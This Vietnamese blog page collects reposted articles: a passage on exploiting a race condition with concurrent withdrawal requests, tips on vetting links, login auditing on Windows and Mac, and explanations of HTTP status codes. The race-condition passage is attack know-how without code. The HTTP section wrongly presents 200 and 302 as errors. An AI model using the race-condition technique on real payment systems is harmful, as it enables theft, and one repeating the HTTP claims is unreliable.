B1, kiểm tra tài khoản ban đầu và xem access log , lúc này ta đang có 10000:

B2, Xử dụng 1 đoạn python để cùng 1 lúc gửi 8 request, mỗi request đều rút 10$ trong cùng 1 thời gian và xem kết quả trả về :
Như vậy sau 10 request, tổng tiền chỉ bị trừ 10$ trong khi đã rút đến 8 lần.
B3. Kiểm tra log file ta thấy 8 request này tới cùng lúc. Và bởi vì server phải đòi hỏi đến 1 giây để xử lý 1 giao dịch, do đó 8 request này đã làm xuất hiện race condition và bị chèn ngang lẫn nhau.


Nguồn Blog
http://antoanthongtin.wordpress.com

Xem Thêm

 

Một số cách kiểm tra độ an toàn của liên kết

Một trong những cách để tránh các mối nguy cơ từ những link dạng này là kiểm tra độ an toàn của nó trước khi click chuột để mở nó. Các liên kết (link) không an toàn xuất hiện ngày càng nhiều trên các trang blog, diễn đàn, mạng xã hội và các trang chia sẻ dữ liệu.

Khả năng ngụy trang của chúng cũng ngày càng trở nên tinh vi hơn. Khi bạn vô tình click vào những link dạng này, bạn có thể sẽ được chuyển đến một trang web chứa virus hoặc mã độc… có thể lây nhiễm vào máy tính và đánh cắp dữ liệu cá nhân của bạn.

Một trong những cách để tránh các mối nguy cơ từ những link dạng này là kiểm tra độ an toàn của nó trước khi click chuột để mở nó. Bài viết sau đây xin giới thiệu đến các bạn một vài cách có thể làm việc này một cách hoàn toàn miễn phí, nhanh chóng và không yêu cầu bạn phải cài đặt thêm bất cứ thứ gì vào máy tính.

1. Xem địa chỉ thực của link ngay trên trình duyệt

Chắc có lẽ bạn đã từng một lần gặp phải một link dạng văn bản liên kết như nhấp vào đây, tải tại đây, download hoặc click here… nhưng khi bấm vào nó thì bạn lại được đưa đến một địa chỉ khác chứ không phải là địa chỉ mà bạn mong muốn. Khi gặp các link thế này, bạn tạm thời đừng click chuột vào nó ngay mà hãy rê chuột lên nó rồi nhìn xuống phía dưới góc trái của trình duyệt web bạn đang sử dụng, địa chỉ thật của nó sẽ hiện ra. Khi đã chắc địa chỉ bạn nhìn thấy là an toàn và đúng là địa chỉ bạn mong muốn thì bạn hãy click vào nó ngược lại thì bạn nên cân nhắc kỹ hoặc tham khảo tiếp các cách sau để kiểm tra độ an toàn của nó.

2. Sử dụng các dịch vụ quét link

Các dịch vụ quét link là những trang web hoặc plug-in cho phép bạn nhập vào địa chỉ URL của một link mà bạn nghi ngờ và kiểm tra độ an toàn của nó. Có rất nhiều dịch vụ miễn phí và đáng tin cậy có thể làm được việc này và URL Void là một trong số đó. URL Voidlà một dịch vụ miễn phí được phát triển bởi công ty NoVirusThanks, nó cho phép bạn phân tích địa chỉ của một website với các bộ máy lưu trữ các tên miền đen (domains blackists) nổi tiếng như Google SafeBrowsing, My Wot, và Norton SafeWeb và nhanh chóng trả về kết quả là độ an toàn của địa chỉ đó.

[Hình: link-an-toan1.jpg]

3. “Soi” địa chỉ thật của link rút gọn

URL Void là một dịch vụ quét link khá tốt. Tuy nhiên nó chỉ có thể quét và kiểm tra địa chỉ URL của link ở dạng đầy đủ, đối với các liên kết dạng rút gọn từ các dịch vụ như bit.ly, ow.ly và tinyurl.com nó thường cho kết quả không chính xác. Đối với những link dạng này, bạn có thể nhờ đến dịch vụ Sucuri.Sucuri sẽ giúp bạn “soi” ra địa chỉ thật của các link rút gọn và sau đó kiểm tra độ an toàn của nó bằng cách bộ máy như Google SafeBrowsing, Norton Safeweb và Phish Tank. Bên cạnh Sucuri, bạn cũng có thể tham khảo một số dịch vụ có khả năng tương tự khác như http://untiny.com, http://urlxray.com...

[Hình: link-an-toan2.jpg]

4. Cách an toàn để sao chép địa chỉ URL của link

Các dịch vụ tương tự như URL Void và Sucuri đều yêu cầu bạn phải nhập (gõ hoặc paste) các địa chỉ URL của link nghi ngờ – nhưng làm thế nào để bạn có thể lấy được một địa chỉ URL của link một cách nhanh chóng và an toàn mà không cần phải mở nó? Rất dễ. Bạn chỉ cần nhấp phải chuột vào link bạn muốn lấy địa chỉ URL rồi chọn Copy Shortcut (đối với IE), Copy Link Location (đối với Firefox) hoặc Copy Link Address (đối với Chrome). Địa chỉ URL sẽ được sao chép vào clipboard ngay sau đó và bạn có thể sử dụng nó để kiểm tra độ an toàn với các dịch vụ trên.

[Hình: link-an-toan3.jpg]

Xem Thêm

 

Cách đơn giản để phát hiện có người sử dụng máy tính của bạn

Có nhiều người sử dụng máy tính không thích đặt mật khẩu cho máy của mình, nhất là khi làm việc ở văn phòng, tuy nhiên điều này cũng gây ra một số rắc rối khi bạn không biết có ai đã sử dụng máy tính của mình lúc đi vắng hay không.


Hoặc giả sử bạn có một đứa em nghịch ngợm hay vài đứa bạn cùng phòng và muốn kiểm tra rằng có ai đã sử dụng máy tính của bạn khi chưa được sự đồng ý. Thật may là Windows và Mac đều có các tính năng giúp bạn kiểm tra những sự đăng nhập trái phép này.

[Hình: Su-dung-1.jpg]

Windows

Trong Windows, bạn có thể kích hoạt tính năng kiểm soát đăng nhập, để nó theo dõi và ghi lại tên tài khoản sử dụng và thời gian mỗi lần đăng nhập vào máy. Để kích hoạt tính năng này, bạn có thể thực hiện theo các bước sau:

[Hình: Su-dung-2.jpg]

Vào Start,"gpedit.msc" trong menu Start và ấn Enter. Sau đó cửa sổ Local Group Policy Editor sẽ hiện ra, trong cây danh sách bên trái, tìm đến Local Computer Policy > Computer Configuration > Windows Settings > Security Settings > Local Policies > Audit Policy.

[Hình: Su-dung-3.jpg]

Trong khung bên phải, kích đúp vào thiết lập Audit logon events, để tùy chỉnh một số thiết lập. Sau khi cửa sổ Audit logon events Properties hiện ra, đánh dấu vào hai lựa chọn Success và Failure, sau đó chọn OK. Lúc này máy tính sẽ kiểm soát và lưu lại tất cả những lần đăng nhập thành công cũng như thất bại (điền sai mật khẩu đăng nhập) vào máy của bạn.

[Hình: Su-dung-4.jpg]

Sau khi đã kích hoạt xong tính năng theo dõi, để có thể xem danh sách thống kê, bạn vào Start gõ vào "Event Viewer" rồi ấn Enter. Cửa sổ Event Viewer sẽ xuất hiện, chọn Windows Logs > Security trong cột bên trái. Hộp thoại Security hiện ra với danh sách các hoạt động trên máy của bạn, bạn sẽ phải để ý đến các hoạt động có Event ID 4624, tương ứng với hoạt động đăng nhập thành công vào máy của bạn.

[Hình: Su-dung-5.jpg]

Bạn có thể kích đúp vào hoạt động đó, để xem thông tin tài khoản đăng nhập, thời gian và một số thông tin khác. Bạn cũng có thể tạo bộ lọc để chỉ hiển thị những hoạt động đăng nhập có Event ID 4624, bằng cách tùy chỉnh trong mục Filter Current Log trên thanh công cụ.

Mac

Trên các máy sử dụng Mac OS, bạn chỉ có thể kiểm tra xem có ai sử dụng máy tính của mình khi bạn rời đi và đang để máy ở chế độ Sleep, nghĩa là nó chỉ lưu lại các hoạt động đánh thức máy tính từ chế độ Sleep. Bạn có thể thực hiện theo các bước sau:

Mở hộp thoại Console bằng cách nhấn Command + Spacebar, hoặc click vào biểu tượng Spotlight và tìm kiếm nó. Gõ từ "wake" vào thanh tìm kiếm, sau đó kéo xuống phần dưới cùng của danh sách, bạn sẽ tìm thấy những hoạt động đăng nhập gần đây nhất.

[Hình: Su-dung-6.jpg]

Một vài thủ thuật đơn giản, nhưng hiểu quả giúp bạn kiểm tra những người sử dụng máy tính của mình khi bạn không ở đó. Việc này khá hữu ích để kiểm soát việc sử dụng máy tính của con cái bạn hoặc các em nhỏ, tuy nhiên trong các trường hợp khác bạn nên đặt một mật khẩu cho máy tính của mình để đảm bảo sự an toàn.

Theo Genk

Xem Thêm

 

Các lỗi HTTP khi truy cập web và cách sửa

Giao thức HTTP viết tắt của cụm từ Hyper Text Transfer Protocol (giao thức truyền siêu văn bản) và nó đã trở thành giao thức mặc định khi bạn sử dụng các trình duyệt để lướt web. Đôi khi bạn gặp các lỗi thông báo khi dùng giao thức HTTP, thường được gọi là HTTP error codes (tạm dịch: mã lỗi HTTP). Mời các bạn theo dõi bài viết để có các nhìn về các mã lỗi này và cách giải quyết.

HTTP Error 500 – Internal Server Error

[Hình: http500error.jpg]

Lỗi này thường do máy chủ nhận thấy có lỗi xảy ra nhưng không thể xác định chính xác lỗi gì và bạn không thể truy cập trang web bị lỗi hoặc tải các tệp tin mà bạn muốn.

Để giải quyết vấn đề này, đầu tiên bạn cần refresh (tạm dịch: "làm tươi") trang web bằng phím F5 hoặc biểu tượng refresh của các trình duyệt. Ở một vài trường hợp thì lỗi này chỉ là lỗi tạm thời và việc refresh trang web có thể giải quyết được. Nếu không được, bạn có thể ghé thăm trang web này sau hoặc báo lại với người quản trị web nếu thấy cần thiết.

HTTP Error 403

Thỉnh thoảng bạn có thể thấy thông điệp HTTP Error 403 – Forbidden, điều này có nghĩa là thông tin hoặc luồng dữ liệu được gửi bởi trình duyệt của máy trạm nhưng máy chủ web từ chối cho truy cập vì một vài lý do.

[Hình: httperror403forbidden.jpg]

Bạn cần kiểm tra lại đường dẫn của website xem đã chính xác chưa, đôi khi thông tin đó được bảo mật bởi người sở hữu website. Bạn có thể gặp thông báo như 401- Not Authorised cũng như thông báo HTTP Error 403 – Forbidden. Cũng có thể lỗi do traqng web bị đóng cửa nên khi bạn truy cập sẽ bị trả về lỗi này.

HTTP Error 503

Có nhiều loại thông báo của lỗi này như “503 Service Temporarily Unavailable” hoặc “503 Service Unavailable”... lỗi này do máy chủ web tạm thời không hoạt động hoặc máy chủ đang bận hoặc đang được bảo trì.

[Hình: httperror503.jpg]

Vấn đề liên quan tới máy chủ nên giải pháp sẽ không có tác dụng từ phía máy trạm, thử refresh lại trang web hoặc báo lại với người quản trị web. Nếu gặp lỗi “Service Unavailable – DNS Failure” có thể modem/Router của bạn có vấn đề, hãy thử khởi động lại chúng.

HTTP Error 400

[Hình: httperror400.jpg]

Khi gặp lỗi “400: Bad Request” hoặc “HTTP Error 400 – Bad Request”, là do yêu cầu gửi từ máy trạm qua trình duyệt web để nạp một trang web nhưng máy chủ web không thể xử lý yêu cầu này.

Giải pháp cho lỗi này gần như không có nhiều ngoài việc kiểm tra lại địa chỉ web hoặc báo lại cho người quản trị để sửa lỗi.

HTTP Error 404

Lỗi chung thường gặp là “HTTP 404 Not Found” , do yêu cầu của máy trạm gửi đến máy chủ khổng thể xử lý giống như lỗi trả về cho người người khi bạn gửi tới một địa chỉ mail bị lỗi từ máy chủ mail.

[Hình: httperror404.jpg]

Có thể máy chủ web không chứa trang web này hoặc các giá trị của DNS (dịch vụ phân giải tên miền) bị lỗi hoặc địa chỉ của trang web này đã bị hỏng. Việc kiểm tra và sửa trang web này cần có sự can thiệp của người quản trị. Ngoài ra, có thể trang web đã được chuyển tới địa chỉ khác nên khi bạn truy cập sẽ gặp lỗi.

HTTP Error 504

[Hình: httperror504.jpg]

Bạn có thể gặp lỗi “HTTP Error 504 – Gateway Timeout” hoặc một vài thông báo tương tự. Lỗi này do máy chủ gặp lỗi khi nhận gói tin phản hồi từ máy chủ xử lý luồng dữ liệu trọng một thời gian nhất định (timeout). Dấu hiệu này cho thấy máy chủ xử lý luồng dữ liệu đang không hoạt động hoặc có thể bị hỏng.

Để giải quyết vấn đề này thì tại máy trạm chỉ có thể refresh hoặc ghé thăm trang web vào dịp khác.

HTTP Error 401

Nếu bạn gặp lỗi "401 Authorization Required" có nghĩa là bạn phải có tài khoản để có thể truy cập vào một trang web nào đó. Nếu bạn không thể truy cập sau khi đã nhập tài khoản thì có nghĩa là bạn gõ sai mật khẩu hoặc tên đăng nhập.

[Hình: httperror401.jpg]

Bạn cần kiểm tra lại địa chỉ xem có sai hay không hoặc nếu trang web không hề yêu cầu đăng nhập để xem thì đây là lỗi từ máy chủ web, bạn nên liên hệ với người quản trị để sửa lỗi này.

HTTP 302

Với lỗi “HTTP Error 302 – Moved temporarily” có nghĩa địa chỉ web đã được di chuyển tạm tới một vị trí khác cũng đồng nghĩa là địa chỉ đã được thay đổi.

[Hình: httperror302.jpg]

Khi địa chỉ web (URL) được chuyển tới vị trí khác thì thông thường webmaster sẽ chuyển hướng nó về địa chỉ mới. Nếu sự chuyển hướng gặp lỗi thì bạn chỉ cần liên hệ webmaster để sửa.

HTTP Error 200

Lỗi này do yêu cầu đã được nhận bởi máy chủ nhưng nó không thể phân phối yêu cầu tới một vài lỗi php trong trang web. Đầu tiên là bạn cần refresh trang web, nếu bộ nhớ của trình duyệt đầy thì bạn có thể gặp lỗi này nên bạn cần dọn sạch bộ nhớ của trình duyệt và kết nối internet lại vì có thể xảy ra lỗi này khi bạn đang sử dụng một kết nối internet chập chờn. Banl có thể rút dây cắm từ modem ra và cắm lại.

[Hình: httperrorcode200.jpg]

Với các thông báo lỗi thường gặp khi bạn sử dụng giao thức HTTP để lướt web phục vụ công việc, học tập ở trên thì các giải pháp đưa ra có thể hữu ích với bạn hoặc những người đang làm quản trị web (webmaster).

Nguồn : CEH

Xem Thêm

 

Copyright © Dương-UG Blog's - Nguyễn Bình Dương